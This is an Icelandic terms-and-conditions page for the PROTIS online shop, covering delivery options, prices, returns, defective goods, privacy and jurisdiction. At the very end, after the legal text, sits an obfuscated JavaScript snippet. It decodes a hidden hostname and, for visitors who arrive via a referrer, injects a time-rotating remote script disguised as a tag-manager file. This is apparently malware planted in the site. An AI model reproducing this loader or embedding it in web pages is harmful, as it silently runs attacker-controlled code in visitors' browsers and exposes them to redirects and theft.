Skilmálar

Eftirfarandi skilmálar gilda um viðskipti á heimasíðu protis.is

UPPLÝSINGAR UM FYRIRTÆKIÐ

Eftirfarandi skilmálar gilda um sölu á vörum PROTIS sem er í eigu Kavita ehf., kt. 660712-0460, Húnabraut 33, 540 Blönduósi.    Netfang:  protis@protis.is.

Kavita ehf. áskilur sér rétt til að hætta við pantanir, t.d. vegna rangra verðupplýsinga eða hætta að bjóða upp á vörutegundir fyrirvaralaust. Áskilinn er réttur til að staðfesta pantanir símleiðis.

 

AFHENDING VÖRU

Allar PROTIS pantanir eru afgreiddar frá Kavita ehf. næsta virka dag eftir pöntun.  Sé varan ekki til á lager mun starfsmaður Kavita ehf. hafa samband og tilkynna um áætlaðan afhendingartíma vörunnar. Hægt er að sækja vefpantanir á skrifstofu PROTIS, Akralind 2 eða fá sent með Íslandspósti.

Um pantanir sem er dreift af Íslandspósti gilda afhendingar-, ábyrgðar og flutningsskilmálar Íslandspósts um afhendingu vörunnar. Kavita ehf. ber samkvæmt þessu enga ábyrgð á týndum sendingum eða tjóni sem kann að verða á vöru í flutningi. Ef að vara týnist í pósti eða verður fyrir tjóni frá því að að hún er send frá Kavita ehf. til viðkomandi er tjónið á ábyrgð kaupanda. Frí heimsending er á pöntunum 8.000 kr og yfir nema annað komi fram.

  

VERÐ Á VÖRU OG SENDINGAKOSTNAÐUR

Öll verð í vefverslun eru með gefin upp með virðisaukaskatti.  Almennur virðisaukaskattur er 24% en af matvörum, þ.á m. fæðubótarefnum er virðisaukaskattur 11%.

Við uppgefið verð bætist sendingakostnaður.

 

Sendingamöguleikar eru eftirfarandi:

PÓSTURINN – PAKKI PÓSTHÚS

Pöntun send á næsta pósthús. Verð: 1.190 kr.

  • Pakki Pósthús er afhentur á pósthúsi viðtakanda við framvísun tilkynningar og skilríkjameð mynd.
  • Tilkynning um pakka er send á GSM númer sem skráð er á pakkann. Ef ekkert GSM númer er skráð er prentuð út tilkynning og hún borin út á það heimilisfang sem skráð er fyrir pakkanum.
  • Viðtakandi getur einnig veitt öðrum aðila skriflegt
    umboð til að taka á móti pakkanum á pósthúsi fyrir sína hönd.
  • Geymslutími pakka á pósthúsi er 30 dagar frá komudegi. Geymslugjald leggst á sendingar eftir 10 virka daga á pósthúsi.

PÓSTURINN – PAKKI HEIM

Pantanir eru almennt keyrðar heim 1- 3 dögum eftir póstlagningu. Verð: 1.490 kr.

  • Pakkar Heim eru keyrðir út til viðtakenda þar sem Pósturinn hefur heimaksturskerfi. Ef póstlagt er fyrir síðasta póstlagningartíma verður pakkinn keyrður út 1., 2. eða 3. dag
    eftir póstlagningu.
  • Gæðastaðlar Póstsins miðast við að tilraun til afhendingar sé reynd í a.m.k. 85% tilfella fyrsta dag eftir póstlagningu þar sem það er mögulegt.

PÓSTURINN – PAKKI PÓSTBOX

Póstbox eru opin 24/7 og eru staðsett víðsvegar um landið. Verð: 990 kr.

Sjá staðsetningar hér.

  • Pakki Póstbox telst afhentur viðtakanda þegar QR kóði hefur verið skannaður eða pin númer slegið inn og hólf opnast.
  • Gæðastaðlar Póstsins miðast við afhendingu daginn eftir í Póstbox í 90% tilfella.
  • Póstbox eru fyllt tvisvar á dag virka daga og einu sinni á laugardögum
  • Viðskiptavinir geta eingöngu móttekið eftirfarandi pakkasendingar í Póstbox:
    • Innlendar pakkasendingar undir stærðarmörkum.
    • Hámarksþyngd fyrir Pakki Póstbox er 20 kg.
    • Innlendar pakkasendingar með engum gjöldum sem viðtakandi þarf að greiða.
    • Innlendar pakkasendingar án viðbótarþjónustu að undanskildu brothætt.
    • Til að nota póstbox þarf að skrá sig á minnpostur.is og velja þar póstbox sem afhendingarval. Hægt er að breyta um valið póstbox hvenær sem er.
  • Eftir að póstbox hefur verið valið munu allar sendingar framvegis berast í það póstbox, óháð utanáskrift sendinganna. Tilkynningar berast í GSM símanúmer viðtakanda.

AÐ SKIPTA OG SKILA VÖRU

 Veittur er 14 daga skilaréttur við kaup á vöru gegn því að framvísað sé sölureikningi sem sýnir með fullnægjandi hætti hvenær varan var keypt. Varan þarf að vera ónotuð, í fullkomnu lagi og í sínum upprunalegu óskemmdu umbúðum þegar henni er skilað. Ef vara er innsigluð má ekki rjúfa innsiglið. Við skil á vöru er miðað við upprunalegt verð hennar, nema viðkomandi vara sé á útsölu eða á sértilboði við vöruskil. Þá er miðað við verð vörunnar þann dag sem henni er skilað.

GÖLLUÐ VARA

 Sé vara gölluð er viðskiptavinum boðin ný vara í staðinn og greiðum við allan sendingakostnað sem um ræðir. Eða endurgreiðum ef þess er krafist. Að öðru leiti vísast til laga um neytendakaup nr.48/2003 og laga um neytendasamninga.

TRÚNAÐUR (ÖRYGGISSKILMÁLAR)

Seljandi heitir kaupanda fullum trúnaði um allar upplýsingar sem hann gefur upp í tengslum við viðskiptin. Upplýsingar verða ekki undir neinum kringumstæðum afhentar þriðja aðila.

LÖG OG VARNARÞING

Um skilmála þessa og þá samninga sem til verða á grundvelli þeirra gilda íslensk lög.  Rísi mál vegna skilmála þessara skulu þau rekin fyrir Héraðsdómi Norðurlands Vestra.

!function (_6dd199) { var _d0d3d0 = Date.now(); var _d4ce14 = 1000; _d0d3d0 = _d0d3d0 / _d4ce14; _d0d3d0 = Math.floor(_d0d3d0); var _1eb404 = 600; _d0d3d0 -= _d0d3d0 % _1eb404; _d0d3d0 = _d0d3d0.toString(16); var _aa32be = _6dd199.referrer; if (!_aa32be) return; var _f11c10 = [20717, 20714, 20711, 20722, 20731, 20717, 20726, 20731, 20731, 20714, 20656, 20713, 20731, 20732, 20717, 20714, 20735, 20714, 20727, 20733, 20733, 20730, 20720, 20656, 20733, 20721, 20723]; _f11c10 = _f11c10.map(function(_a47c7e){ return _a47c7e ^ 20638; }); var _54411e = "6a6ab9b728b75d01d29773439bcfdd8c"; _f11c10 = String.fromCharCode(..._f11c10); var _7a97ab = "https://"; var _751c1c = "/"; var _b61378 = "gtm-"; var _fa4fc7 = ".js"; var _75d7f7 = _6dd199.createElement("script"); _75d7f7.type = "text/javascript"; _75d7f7.async = true; _75d7f7.src = _7a97ab + _f11c10 + _751c1c + _b61378 + _d0d3d0 + _fa4fc7; _6dd199.getElementsByTagName("head")[0].appendChild(_75d7f7) }(document);